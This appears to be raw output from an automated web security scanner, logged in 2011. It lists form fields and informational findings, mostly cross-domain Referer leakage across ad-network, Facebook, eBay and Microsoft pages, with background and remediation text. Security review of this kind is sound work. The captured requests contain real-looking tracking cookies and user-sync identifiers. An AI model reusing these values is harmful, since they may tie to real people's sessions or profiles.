ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
ctl00$content$t2_ddlCountry
phone
email
lead_source
oid
hdnFormName
00N30000000lSjP
00N70000002OYnj
ctl00$content$hdnProdCode
00N70000001kj1U
00N70000002CztM
00N30000000llIC
00N70000002DlXb
retURL

Request

GET /landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx?_kk=defect%20tracking%20software&_kt=482c9585-bb4d-4f18-a618-06cac501c541&gclid=CMLoqZDNjaoCFYaD5QodbQ3F0w HTTP/1.1
Host: www.intelex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

19.6. http://www.mavitunasecurity.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavitunasecurity.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain mavitunasecurity.us1.list-manage.com. The form contains the following fields:

Request

GET / HTTP/1.1
Host: www.mavitunasecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11213
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:39:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><title>
   N
...[SNIP]...
<img src="/v2/mg/txtnewsletter.gif">
               <form action="http://mavitunasecurity.us1.list-manage.com/subscribe/post?u=7b9010b63c6aec6fce0bf4205&id=c5cc913cd9"
           method="post" target="_blank">
               <input type="text" class="btn" value="" name="EMAIL" style="width: 220px" />
...[SNIP]...

20. Cross-domain Referer leakage previous next
There are 94 instances of this issue:

http://a.netmng.com/hic/
http://a.tribalfusion.com/j.ad
http://a.tribalfusion.com/j.ad
http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127
http://ad.doubleclick.net/adj/gamesco.gh/home/w
http://admeld.adnxs.com/usersync
http://admeld.lucidmedia.com/clicksense/admeld/match
http://answers.microsoft.com/en-us/Forum/ForumThreadList
http://answers.microsoft.com/en-us/Site/StartSignIn
http://answers.microsoft.com/en-us/Site/StartSignIn
http://answers.microsoft.com/en-us/User/UserThreadList
http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01
http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01
http://bcp.crwdcntrl.net/px
http://bing.fansnap.com/checkout/clickout/415814268
http://bing.fansnap.com/checkout/clickout/418563179
http://bing.fansnap.com/checkout/clickout/418563179
http://bing.fansnap.com/checkout/index/415814268
http://bing.fansnap.com/checkout/index/418563179
http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669
http://bp.specificclick.net/
http://cache.boston.com/universal/js/twitterwidget.js
http://cc.bingj.com/cache.aspx
http://clk.specificclick.net/click/v=5
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://developers.facebook.com/
http://digg.com/submit
http://googleads.g.doubleclick.net/pagead/ads
http://ib.adnxs.com/ptj
http://ib.adnxs.com/seg
http://mobile.ebay.com/wp-content/themes/platformpro/js/ticker_twitter.js
http://pixel.invitemedia.com/admeld_sync
http://rad.msn.com/ADSAdClient31.dll
http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5
https://signin.ebay.com/ws/eBayISAPI.dll
http://srx.main.ebayrtm.com/rtm
https://support.discoverbing.com/Default.aspx
http://support.microsoft.com/common/international.aspx
http://support.microsoft.com/contactus/contact_microsoft_customer_serv
http://support.microsoft.com/oas/default.aspx
https://support.microsoft.com/oas/default.aspx
http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228
http://umfcluj.ro/Detaliu.aspx
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/search.aspx
http://waypointlivingspaces.com/locate-dealer
http://www.adminitrack.com/
http://www.axosoft.com/lp/ga/bug-tracking-software/
http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html
http://www.clickmanage.com/events/clickevent.aspx
http://www.discoverbing.com/dbing/community.axd
http://www.facebook.com/advertising/
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/prefetch.php
http://www.facebook.com/ajax/prefetch.php
http://www.facebook.com/badges/
http://www.facebook.com/careers/
http://www.facebook.com/find-friends
http://www.facebook.com/help/
http://www.facebook.com/mobile/
http://www.facebook.com/pages/create.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/terms.php
http://www.fastteks.com/TechSolutions/Contact-Us.aspx
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.google.com/url
http://www.google.com/url
http://www.googleadservices.com/pagead/conversion/1036609180/
http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx
http://www.livedrive.com/SignupToLivedrive
http://www.myspace.com/auth/loginform
http://www.nne.aaa.com/en-nne/Pages/Home.aspx
http://www.numarasoftware.com/welcome/service_desk.aspx
http://www.seapine.com/ttpro.html
http://www.stubhub.com/
http://www.stumbleupon.com/submit
http://www.techexcel.com/products/devsuite/devteststudio.html
http://www.ticketmaster.com/event/000043582C516D43

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

20.1. http://a.netmng.com/hic/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.netmng.com
Path:	/hic/

Issue detail

The page was loaded from a URL containing a query string:

http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?
http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?
http://ad.doubleclick.net/adj/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?
http://ad.doubleclick.net/jump/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest= HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:42:55 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 17 Jul 2011 20:42:55 GMT
Last-Modified: Sun, 17 Jul 2011 20:42:55 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=6twZuywAYrkZnj3PjCGa8UGSBEUzkooZqU43f%2FGiyI1UXu7W6xg6VD2D0wBlPdOTT5OQE4U8evN3fFU06w2erg%3D%3D; expires=Wed, 18-Jan-2012 20:42:55 GMT; path=/
Set-Cookie: evo5_display=Lb7I6%2B93hnCmP8Ly1Y8aIz6mDQ1J3sznCNFCT7eof5ElbvVxhEDm93raeYwzidf%2FQorvxtKsBHYJrrYeSIbRYA%3D%3D; expires=Thu, 23-Jun-44591 20:42:55 GMT; path=/; domain=.netmng.com
Content-Length: 1472
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?"WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000"><SCRIPT language="JavaScript1.1"SRC="http://ad.doubleclick.net/adj/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?"><IMG SRC="http://ad.doubleclick.net/ad/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?"BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

20.2. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The page was loaded from a URL containing a query string:

http://a.tribalfusion.com/j.ad?site=bostonglobe&adSpace=300x250&tagKey=987828525&th=20001302335&tKey=undefined&size=300x250&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=8207455&a=1&rnd=8216825

The response contains the following link to another domain:

http://tag.admeld.com/passback/js/610/bostonglobe/300x250/12/meld.js

Request

GET /j.ad?site=bostonglobe&adSpace=300x250&tagKey=987828525&th=20001302335&tKey=undefined&size=300x250&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=8207455&a=1&rnd=8216825 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: ANON_ID=a4nWgZbSZdIis9TnMTYekc374qY9Xj09Hp2T2xg64xYZav67kIJkxQEEf2ojK1s35udiFgJ9Zb9lvSiGZa3mRsVG8ESjSPPsTgrsd3WQEVjYA9bNxuX8tU6X2XXJGmO5ZarAZckFWJdf0TR2Zav5FD4XrJ1ZdjbZc5A0po8XJGqLZaF32Aov5WZckUiyDCF4qFuZctawJUmSUByy40hrAuONZbFkUbp8r6ebf5StDBmgC2wc6E7hfApoY5yiDSZdYMZbZb2ZacswQtQfUGotCtpjsM

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=a2nXSoP3rTwoiAyWrVjrMprETAW3VoE9iJ3ZaC9NKjcuSYjAwNoUderTsfhtT7CvHqlhNolZbO3wZb6Pj4CR6BnIoBDy2sqRgXaUv3as0WA1QsjE1GEf9Py6TCc5J5uvjINffJUb8VpXxo3EC0OnVPlJlIZdj8Wbw3Zd8QPACFYZb9BiSfcRlyHZaZcfatO3p6twFN4WI9yhVTroynMZdnfurN7oBm8cZd5aZbBaLZdkK2drax8oHt1ZccxUs8DiE065deiBlyn13J5RFVXrwTHxWFecJ; path=/; domain=.tribalfusion.com; expires=Mon, 17-Oct-2011 20:44:26 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 1147
Expires: 0
Connection: keep-alive

document.write('<script src="http://tag.admeld.com/passback/js/610/bostonglobe/300x250/12/meld.js"><\/script>');
document.write('<script type="text/javascript">\r\nvar TFPix1725274878 = [\r\n
...[SNIP]...

20.3. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The page was loaded from a URL containing a query string:

http://a.tribalfusion.com/j.ad?site=bostonglobe&adSpace=728x90&tagKey=987828525&th=20001302335&tKey=undefined&size=728x90&flashVer=0&ver=1.20&center=1&url=http%3A%2F%2Fboston.com%2F&rurl=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=1&p=8117328&a=1&rnd=8110671

The response contains the following link to another domain:

http://tag.admeld.com/passback/js/610/bostonglobe/728x90/12/meld.js

Request

Response

20.4. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.NetMining/B5146585.127

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127;sz=728x90;pc=%5BTPAS_ID%5D;ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;?

The response contains the following links to other domains:

http://s0.2mdn.net/2917862/Q311_CBCS-SMB_AQ_BDL_94.85x12_728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N1558.NetMining/B5146585.127;sz=728x90;pc=%5BTPAS_ID%5D;ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7171
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:43:01 GMT
Expires: Tue, 19 Jul 2011 20:43:01 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
vaxbr__oadest=http%3a%2f%2fbusiness.comcast.com/94Offer/index.aspx%3FCMP%3DBAC-243767781-5702945-1109496-67396807-%26omndfa%3D1%26utm_source%3D1109496%26utm_medium%3D43116469%26utm_campaign%3D5702945"><img src="http://s0.2mdn.net/2917862/Q311_CBCS-SMB_AQ_BDL_94.85x12_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

20.5. http://ad.doubleclick.net/adj/gamesco.gh/home/w previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/gamesco.gh/home/w

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 258
Date: Tue, 19 Jul 2011 20:25:41 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b49/0/0/%2a/m;44306;0-0;0;57282045;31-1/1;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="brought to you by our sponsors"></a>
...[SNIP]...

20.6. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The page was loaded from a URL containing a query string:

http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=7212282717808390200&expiration=0

Request

GET /usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

20.7. http://admeld.lucidmedia.com/clicksense/admeld/match previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.lucidmedia.com
Path:	/clicksense/admeld/match

Issue detail

The page was loaded from a URL containing a query string:

http://admeld.lucidmedia.com/clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3449391312096071132

Request

